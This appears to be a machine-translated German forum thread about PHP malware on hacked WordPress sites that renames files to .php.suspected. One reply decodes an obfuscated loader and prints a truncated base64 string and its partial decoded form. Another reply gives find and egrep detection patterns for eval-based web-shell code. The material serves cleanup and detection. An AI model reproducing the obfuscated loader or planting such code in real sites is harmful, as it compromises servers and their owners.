Es ist etwas verschleiert, aber ich habe es entschleiert. Die Funktion flnftovr nimmt einen String und ein Array als Argumente. Es erstellt einen neuen String $ggy mit der Formel
isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];}
Anschließend wird der Zeichenfolge base64_decode vorangestellt.
Der String ist $s, das Array ist $koicev. Es wertet dann das Ergebnis dieser Manipulation aus. So wird schließlich ein String erstellt:
base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=)
Was also tatsächlich auf Ihrem Server ausgeführt wird, ist:
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if(isset($_SERVER)
encode(serialize($res));
}
Wenn Sie dies nicht erstellt haben und vermuten, dass Ihre Website gehackt wurde, würde ich vorschlagen, dass Sie den Server löschen und eine neue Installation aller Apps erstellen, die auf Ihrem Server ausgeführt werden.
Umbenennen von PHP-Dateien in php.suspected wird normalerweise von einem Hackerskript beabsichtigt und ausgeführt. Sie ändern die Dateierweiterung, um den Eindruck zu erwecken, dass die Datei von einer Antimalware-Software überprüft wurde, sicher ist und nicht ausgeführt werden kann. Aber in Wirklichkeit ist es nicht. Sie ändern die Erweiterung auf „php“, wann immer sie das Skript aufrufen möchten, und danach ändern sie die Erweiterung wieder auf „suspected“. Sie können darüber bei Securi Research Labs lesen
Vielleicht ist dieser Beitrag alt, aber das Thema lebt noch. Insbesondere laut der Malware-Kampagne vom Juni 2019, die auf WordPress-Plugins abzielt. Ich habe ein paar „verdächtige“ Dateien in den WordPress-Unterverzeichnissen meines Kunden gefunden (z. B. wp-content)
Die Umbenennung von .php
Dateien nach .php.suspected
findet heute immer wieder statt. Die folgenden Befehle sollten nichts bringen:
find <web site root> -name '*.suspected' -print
find <web site root> -name '.*.ico' -print
In meinem Fall konnten die infizierten Dateien mit den folgenden Befehlen gefunden werden:
cd <web site root>
egrep -Rl '\$GLOBALS.*\\x'
egrep -Rl -Ezo '/\*(\w+)\*/\s*@include\s*[^;]+;\s*/\*'
egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'
Eine längere Beschreibung des Problems und wie man damit umgeht, habe ich auf GitHub vorbereitet.